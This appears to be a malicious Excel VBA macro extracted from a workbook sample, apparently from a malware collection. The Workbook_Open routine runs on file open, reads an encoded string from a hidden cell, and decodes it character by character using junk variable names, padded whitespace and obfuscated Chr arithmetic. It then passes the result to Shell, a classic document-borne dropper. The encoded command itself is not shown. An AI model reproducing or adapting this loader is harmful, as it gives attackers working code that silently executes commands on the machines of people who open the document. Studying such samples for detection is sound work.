Attribute VB_Name = "Bu|fffd|alismaKitabi"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit





      Private forced As Object




    Private tubercularised2 As String








     Sub Workbook_Open()




     







       carioca Sheets("ZOZRv").Cells(134, 8).Value






       




      End Sub
Private Sub carioca(ByVal jocelynne As String)




    Dim tubercularised As Long







      Dim wladyslaw As String






     For tubercularised = 2 To Len(jocelynne) Step 2




     wladyslaw = wladyslaw & Chr(chlorella(imperfectible(jocelynne, tubercularised), 33))
Next tubercularised
                                         Shell wladyslaw








      




       End Sub
Private Function imperfectible(ByVal majorette As String, ByVal gothic As Long) As String







      tubercularised2 = Chr(0 - 85 - 68 - Asc("E") - Asc("K") - 69 + 66 + Asc("\") - 72 + Asc("W") - Asc("I") - Asc("[") - Asc("K") + 83 - 67 - 91 + 545) & Chr(0 + 77 + Asc("C") + 72 + 69 + 76 - 78 - Asc("I") + Asc("T") - 91 + Asc("X") + Asc("R") - Asc("L") + 76 + 78 - 77 - 302)







      







     






       imperfectible = tubercularised2 & Right(Left(majorette, gothic), 2)








       End Function
Private Function chlorella(ByVal majorette As String, ByVal gothic As Long) As Long








      



      chlorella = CLng(majorette) - gothic
End Function
Attribute VB_Name = "Sayfa1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


INQUEST-PP=macro
